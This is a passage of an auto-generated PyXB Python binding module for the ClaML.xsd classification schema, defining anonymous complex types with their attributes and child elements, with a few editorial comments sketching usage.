__authority._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 62, 12)
authority = property(__authority.value, __authority.set, None, None)
# Attribute uid uses Python identifier uid
__uid = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'uid'), 'uid', '__AbsentNamespace0_CTD_ANON_4_uid', pyxb.binding.datatypes.anySimpleType, required=True)
__uid._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 63, 12)
__uid._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 63, 12)
uid = property(__uid.value, __uid.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__authority.name() : __authority,
__uid.name() : __uid
})
_module_typeBindings.CTD_ANON_4 = CTD_ANON_4
# Complex type [anonymous] with content type MIXED
class CTD_ANON_5 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type MIXED"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_MIXED
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 67, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute name uses Python identifier name
__name = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'name'), 'name', '__AbsentNamespace0_CTD_ANON_5_name', pyxb.binding.datatypes.NMTOKEN, required=True)
__name._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 68, 12)
__name._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 68, 12)
name = property(__name.value, __name.set, None, None)
# Attribute version uses Python identifier version
__version = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'version'), 'version', '__AbsentNamespace0_CTD_ANON_5_version', pyxb.binding.datatypes.anySimpleType)
__version._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 69, 12)
__version._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 69, 12)
version = property(__version.value, __version.set, None, None)
# Attribute date uses Python identifier date
__date = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'date'), 'date', '__AbsentNamespace0_CTD_ANON_5_date', pyxb.binding.datatypes.anySimpleType)
__date._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 70, 12)
__date._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 70, 12)
date = property(__date.value, __date.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__name.name() : __name,
__version.name() : __version,
__date.name() : __date
})
_module_typeBindings.CTD_ANON_5 = CTD_ANON_5
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_6 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 74, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element Author uses Python identifier Author
__Author = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Author'), 'Author', '__AbsentNamespace0_CTD_ANON_6_Author', True, pyxb.utils.utility.Location('ClaML.xsd', 80, 4), )
Author = property(__Author.value, __Author.set, None, None)
_ElementMap.update({
__Author.name() : __Author
})
_AttributeMap.update({
})
_module_typeBindings.CTD_ANON_6 = CTD_ANON_6
# Complex type [anonymous] with content type MIXED
class CTD_ANON_7 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type MIXED"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_MIXED
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 81, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute name uses Python identifier name
__name = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'name'), 'name', '__AbsentNamespace0_CTD_ANON_7_name', pyxb.binding.datatypes.ID, required=True)
__name._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 82, 12)
__name._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 82, 12)
name = property(__name.value, __name.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__name.name() : __name
})
_module_typeBindings.CTD_ANON_7 = CTD_ANON_7
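
# Editorial note: the ID-typed 'name' attributes in this and similar types are
# the anchors that IDREF/IDREFS attributes elsewhere in this module ('kind',
# 'usage', 'variants') resolve against in a schema-valid document.
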
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_8 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 86, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element ClassKind uses Python identifier ClassKind
__ClassKind = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'ClassKind'), 'ClassKind', '__AbsentNamespace0_CTD_ANON_8_ClassKind', True, pyxb.utils.utility.Location('ClaML.xsd', 106, 4), )
ClassKind = property(__ClassKind.value, __ClassKind.set, None, None)
_ElementMap.update({
__ClassKind.name() : __ClassKind
})
_AttributeMap.update({
})
_module_typeBindings.CTD_ANON_8 = CTD_ANON_8
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_9 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 93, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element RubricKind uses Python identifier RubricKind
__RubricKind = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'RubricKind'), 'RubricKind', '__AbsentNamespace0_CTD_ANON_9_RubricKind', True, pyxb.utils.utility.Location('ClaML.xsd', 114, 4), )
RubricKind = property(__RubricKind.value, __RubricKind.set, None, None)
_ElementMap.update({
__RubricKind.name() : __RubricKind
})
_AttributeMap.update({
})
_module_typeBindings.CTD_ANON_9 = CTD_ANON_9
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_10 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 100, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element UsageKind uses Python identifier UsageKind
__UsageKind = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'UsageKind'), 'UsageKind', '__AbsentNamespace0_CTD_ANON_10_UsageKind', True, pyxb.utils.utility.Location('ClaML.xsd', 130, 4), )
UsageKind = property(__UsageKind.value, __UsageKind.set, None, None)
_ElementMap.update({
__UsageKind.name() : __UsageKind
})
_AttributeMap.update({
})
_module_typeBindings.CTD_ANON_10 = CTD_ANON_10
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_11 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 107, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element Display uses Python identifier Display
__Display = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Display'), 'Display', '__AbsentNamespace0_CTD_ANON_11_Display', True, pyxb.utils.utility.Location('ClaML.xsd', 136, 4), )
Display = property(__Display.value, __Display.set, None, None)
# Attribute name uses Python identifier name
__name = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'name'), 'name', '__AbsentNamespace0_CTD_ANON_11_name', pyxb.binding.datatypes.ID, required=True)
__name._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 111, 12)
__name._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 111, 12)
name = property(__name.value, __name.set, None, None)
_ElementMap.update({
__Display.name() : __Display
})
_AttributeMap.update({
__name.name() : __name
})
_module_typeBindings.CTD_ANON_11 = CTD_ANON_11
# Complex type [anonymous] with content type EMPTY
class CTD_ANON_12 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 131, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute name uses Python identifier name
__name = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'name'), 'name', '__AbsentNamespace0_CTD_ANON_12_name', pyxb.binding.datatypes.ID, required=True)
__name._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 132, 12)
__name._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 132, 12)
name = property(__name.value, __name.set, None, None)
# Attribute mark uses Python identifier mark
__mark = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'mark'), 'mark', '__AbsentNamespace0_CTD_ANON_12_mark', pyxb.binding.datatypes.anySimpleType, required=True)
__mark._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 133, 12)
__mark._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 133, 12)
mark = property(__mark.value, __mark.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__name.name() : __name,
__mark.name() : __mark
})
_module_typeBindings.CTD_ANON_12 = CTD_ANON_12
# Complex type [anonymous] with content type MIXED
class CTD_ANON_13 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type MIXED"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_MIXED
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 137, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute {http://www.w3.org/XML/1998/namespace}lang uses Python identifier lang
__lang = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(pyxb.namespace.XML, 'lang'), 'lang', '__AbsentNamespace0_CTD_ANON_13_httpwww_w3_orgXML1998namespacelang', pyxb.binding.xml_.STD_ANON_lang, required=True)
__lang._DeclarationLocation = None
__lang._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 138, 12)
lang = property(__lang.value, __lang.set, None, None)
# Attribute variants uses Python identifier variants
__variants = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'variants'), 'variants', '__AbsentNamespace0_CTD_ANON_13_variants', pyxb.binding.datatypes.IDREF)
__variants._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 139, 12)
__variants._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 139, 12)
variants = property(__variants.value, __variants.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__lang.name() : __lang,
__variants.name() : __variants
})
_module_typeBindings.CTD_ANON_13 = CTD_ANON_13
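
# Editorial note: 'lang' is the namespace-qualified attribute
# {http://www.w3.org/XML/1998/namespace}lang, bound through PyXB's built-in
# xml namespace support (pyxb.binding.xml_); its declaration lives outside
# ClaML.xsd, which is why _DeclarationLocation is None. Sketch, assuming `d`
# is a CTD_ANON_13 instance (the XSD locations suggest this is the type of the
# Display element declared at ClaML.xsd line 136):
#
#   d.lang        # required, e.g. 'en'
#   d.variants    # optional IDREF
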
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_14 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 143, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element Meta uses Python identifier Meta
__Meta = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Meta'), 'Meta', '__AbsentNamespace0_CTD_ANON_14_Meta', True, pyxb.utils.utility.Location('ClaML.xsd', 53, 4), )
Meta = property(__Meta.value, __Meta.set, None, None)
# Element Rubric uses Python identifier Rubric
__Rubric = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Rubric'), 'Rubric', '__AbsentNamespace0_CTD_ANON_14_Rubric', True, pyxb.utils.utility.Location('ClaML.xsd', 217, 4), )
Rubric = property(__Rubric.value, __Rubric.set, None, None)
# Element History uses Python identifier History
__History = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'History'), 'History', '__AbsentNamespace0_CTD_ANON_14_History', True, pyxb.utils.utility.Location('ClaML.xsd', 236, 4), )
History = property(__History.value, __History.set, None, None)
# Element SubClass uses Python identifier SubClass
__SubClass = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'SubClass'), 'SubClass', '__AbsentNamespace0_CTD_ANON_14_SubClass', True, pyxb.utils.utility.Location('ClaML.xsd', 248, 4), )
SubClass = property(__SubClass.value, __SubClass.set, None, None)
# Attribute code uses Python identifier code
__code = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'code'), 'code', '__AbsentNamespace0_CTD_ANON_14_code', pyxb.binding.datatypes.NMTOKEN, required=True)
__code._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 150, 12)
__code._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 150, 12)
code = property(__code.value, __code.set, None, None)
# Attribute variants uses Python identifier variants
__variants = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'variants'), 'variants', '__AbsentNamespace0_CTD_ANON_14_variants', pyxb.binding.datatypes.IDREFS)
__variants._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 151, 12)
__variants._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 151, 12)
variants = property(__variants.value, __variants.set, None, None)
_ElementMap.update({
__Meta.name() : __Meta,
__Rubric.name() : __Rubric,
__History.name() : __History,
__SubClass.name() : __SubClass
})
_AttributeMap.update({
__code.name() : __code,
__variants.name() : __variants
})
_module_typeBindings.CTD_ANON_14 = CTD_ANON_14
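
# Sketch (editorial): assuming `m` is a CTD_ANON_14 instance, its SubClass
# children bind to CTD_ANON_23 below, an EMPTY type that carries only a code
# reference, so child navigation is by code lookup rather than by nesting:
#
#   child_codes = [sc.code for sc in m.SubClass]
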
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_15 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 155, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element Meta uses Python identifier Meta
__Meta = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Meta'), 'Meta', '__AbsentNamespace0_CTD_ANON_15_Meta', True, pyxb.utils.utility.Location('ClaML.xsd', 53, 4), )
Meta = property(__Meta.value, __Meta.set, None, None)
# Element Rubric uses Python identifier Rubric
__Rubric = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Rubric'), 'Rubric', '__AbsentNamespace0_CTD_ANON_15_Rubric', True, pyxb.utils.utility.Location('ClaML.xsd', 217, 4), )
Rubric = property(__Rubric.value, __Rubric.set, None, None)
# Element History uses Python identifier History
__History = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'History'), 'History', '__AbsentNamespace0_CTD_ANON_15_History', True, pyxb.utils.utility.Location('ClaML.xsd', 236, 4), )
History = property(__History.value, __History.set, None, None)
# Element SuperClass uses Python identifier SuperClass
__SuperClass = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'SuperClass'), 'SuperClass', '__AbsentNamespace0_CTD_ANON_15_SuperClass', False, pyxb.utils.utility.Location('ClaML.xsd', 242, 4), )
SuperClass = property(__SuperClass.value, __SuperClass.set, None, None)
# Element SubClass uses Python identifier SubClass
__SubClass = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'SubClass'), 'SubClass', '__AbsentNamespace0_CTD_ANON_15_SubClass', True, pyxb.utils.utility.Location('ClaML.xsd', 248, 4), )
SubClass = property(__SubClass.value, __SubClass.set, None, None)
# Attribute modifier uses Python identifier modifier
__modifier = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'modifier'), 'modifier', '__AbsentNamespace0_CTD_ANON_15_modifier', pyxb.binding.datatypes.NMTOKEN, required=True)
__modifier._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 163, 12)
__modifier._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 163, 12)
modifier = property(__modifier.value, __modifier.set, None, None)
# Attribute code uses Python identifier code
__code = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'code'), 'code', '__AbsentNamespace0_CTD_ANON_15_code', pyxb.binding.datatypes.NMTOKEN, required=True)
__code._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 164, 12)
__code._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 164, 12)
code = property(__code.value, __code.set, None, None)
# Attribute usage uses Python identifier usage
__usage = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'usage'), 'usage', '__AbsentNamespace0_CTD_ANON_15_usage', pyxb.binding.datatypes.IDREF)
__usage._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 165, 12)
__usage._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 165, 12)
usage = property(__usage.value, __usage.set, None, None)
# Attribute variants uses Python identifier variants
__variants = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'variants'), 'variants', '__AbsentNamespace0_CTD_ANON_15_variants', pyxb.binding.datatypes.IDREFS)
__variants._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 166, 12)
__variants._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 166, 12)
variants = property(__variants.value, __variants.set, None, None)
_ElementMap.update({
__Meta.name() : __Meta,
__Rubric.name() : __Rubric,
__History.name() : __History,
__SuperClass.name() : __SuperClass,
__SubClass.name() : __SubClass
})
_AttributeMap.update({
__modifier.name() : __modifier,
__code.name() : __code,
__usage.name() : __usage,
__variants.name() : __variants
})
_module_typeBindings.CTD_ANON_15 = CTD_ANON_15
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_16 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 170, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element Meta uses Python identifier Meta
__Meta = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Meta'), 'Meta', '__AbsentNamespace0_CTD_ANON_16_Meta', True, pyxb.utils.utility.Location('ClaML.xsd', 53, 4), )
Meta = property(__Meta.value, __Meta.set, None, None)
# Element ModifiedBy uses Python identifier ModifiedBy
__ModifiedBy = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'ModifiedBy'), 'ModifiedBy', '__AbsentNamespace0_CTD_ANON_16_ModifiedBy', True, pyxb.utils.utility.Location('ClaML.xsd', 186, 4), )
ModifiedBy = property(__ModifiedBy.value, __ModifiedBy.set, None, None)
# Element ExcludeModifier uses Python identifier ExcludeModifier
__ExcludeModifier = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'ExcludeModifier'), 'ExcludeModifier', '__AbsentNamespace0_CTD_ANON_16_ExcludeModifier', True, pyxb.utils.utility.Location('ClaML.xsd', 205, 4), )
ExcludeModifier = property(__ExcludeModifier.value, __ExcludeModifier.set, None, None)
# Element Rubric uses Python identifier Rubric
__Rubric = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Rubric'), 'Rubric', '__AbsentNamespace0_CTD_ANON_16_Rubric', True, pyxb.utils.utility.Location('ClaML.xsd', 217, 4), )
Rubric = property(__Rubric.value, __Rubric.set, None, None)
# Element History uses Python identifier History
__History = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'History'), 'History', '__AbsentNamespace0_CTD_ANON_16_History', True, pyxb.utils.utility.Location('ClaML.xsd', 236, 4), )
History = property(__History.value, __History.set, None, None)
# Element SuperClass uses Python identifier SuperClass
__SuperClass = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'SuperClass'), 'SuperClass', '__AbsentNamespace0_CTD_ANON_16_SuperClass', True, pyxb.utils.utility.Location('ClaML.xsd', 242, 4), )
SuperClass = property(__SuperClass.value, __SuperClass.set, None, None)
# Element SubClass uses Python identifier SubClass
__SubClass = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'SubClass'), 'SubClass', '__AbsentNamespace0_CTD_ANON_16_SubClass', True, pyxb.utils.utility.Location('ClaML.xsd', 248, 4), )
SubClass = property(__SubClass.value, __SubClass.set, None, None)
# Attribute code uses Python identifier code
__code = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'code'), 'code', '__AbsentNamespace0_CTD_ANON_16_code', pyxb.binding.datatypes.NMTOKEN, required=True)
__code._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 180, 12)
__code._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 180, 12)
code = property(__code.value, __code.set, None, None)
# Attribute kind uses Python identifier kind
__kind = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'kind'), 'kind', '__AbsentNamespace0_CTD_ANON_16_kind', pyxb.binding.datatypes.IDREF, required=True)
__kind._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 181, 12)
__kind._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 181, 12)
kind = property(__kind.value, __kind.set, None, None)
# Attribute usage uses Python identifier usage
__usage = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'usage'), 'usage', '__AbsentNamespace0_CTD_ANON_16_usage', pyxb.binding.datatypes.IDREF)
__usage._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 182, 12)
__usage._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 182, 12)
usage = property(__usage.value, __usage.set, None, None)
# Attribute variants uses Python identifier variants
__variants = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'variants'), 'variants', '__AbsentNamespace0_CTD_ANON_16_variants', pyxb.binding.datatypes.IDREFS)
__variants._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 183, 12)
__variants._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 183, 12)
variants = property(__variants.value, __variants.set, None, None)
_ElementMap.update({
__Meta.name() : __Meta,
__ModifiedBy.name() : __ModifiedBy,
__ExcludeModifier.name() : __ExcludeModifier,
__Rubric.name() : __Rubric,
__History.name() : __History,
__SuperClass.name() : __SuperClass,
__SubClass.name() : __SubClass
})
_AttributeMap.update({
__code.name() : __code,
__kind.name() : __kind,
__usage.name() : __usage,
__variants.name() : __variants
})
_module_typeBindings.CTD_ANON_16 = CTD_ANON_16
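
# Sketch (editorial): CTD_ANON_16 matches the content model of the Class
# element declared at ClaML.xsd line 169. Rubric children bind to CTD_ANON_19
# and their Label children to the mixed-content type CTD_ANON_20; the text of
# a mixed-content binding is reachable via PyXB's orderedContent():
#
#   for rubric in cls.Rubric:
#       for label in rubric.Label:
#           text = ''.join(c.value for c in label.orderedContent()
#                          if isinstance(c.value, str))
#           print(rubric.kind, label.lang, text)
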
# Complex type [anonymous] with content type EMPTY
class CTD_ANON_17 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 206, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute code uses Python identifier code
__code = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'code'), 'code', '__AbsentNamespace0_CTD_ANON_17_code', pyxb.binding.datatypes.NMTOKEN, required=True)
__code._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 207, 12)
__code._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 207, 12)
code = property(__code.value, __code.set, None, None)
# Attribute variants uses Python identifier variants
__variants = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'variants'), 'variants', '__AbsentNamespace0_CTD_ANON_17_variants', pyxb.binding.datatypes.IDREFS)
__variants._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 208, 12)
__variants._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 208, 12)
variants = property(__variants.value, __variants.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__code.name() : __code,
__variants.name() : __variants
})
_module_typeBindings.CTD_ANON_17 = CTD_ANON_17
# Complex type [anonymous] with content type EMPTY
class CTD_ANON_18 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 212, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute code uses Python identifier code
__code = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'code'), 'code', '__AbsentNamespace0_CTD_ANON_18_code', pyxb.binding.datatypes.NMTOKEN, required=True)
__code._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 213, 12)
__code._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 213, 12)
code = property(__code.value, __code.set, None, None)
# Attribute variants uses Python identifier variants
__variants = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'variants'), 'variants', '__AbsentNamespace0_CTD_ANON_18_variants', pyxb.binding.datatypes.IDREFS)
__variants._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 214, 12)
__variants._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 214, 12)
variants = property(__variants.value, __variants.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__code.name() : __code,
__variants.name() : __variants
})
_module_typeBindings.CTD_ANON_18 = CTD_ANON_18
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_19 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 218, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element Label uses Python identifier Label
__Label = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Label'), 'Label', '__AbsentNamespace0_CTD_ANON_19_Label', True, pyxb.utils.utility.Location('ClaML.xsd', 228, 4), )
Label = property(__Label.value, __Label.set, None, None)
# Element History uses Python identifier History
__History = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'History'), 'History', '__AbsentNamespace0_CTD_ANON_19_History', True, pyxb.utils.utility.Location('ClaML.xsd', 236, 4), )
History = property(__History.value, __History.set, None, None)
# Attribute id uses Python identifier id
__id = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'id'), 'id', '__AbsentNamespace0_CTD_ANON_19_id', pyxb.binding.datatypes.ID)
__id._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 223, 12)
__id._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 223, 12)
id = property(__id.value, __id.set, None, None)
# Attribute kind uses Python identifier kind
__kind = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'kind'), 'kind', '__AbsentNamespace0_CTD_ANON_19_kind', pyxb.binding.datatypes.IDREF, required=True)
__kind._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 224, 12)
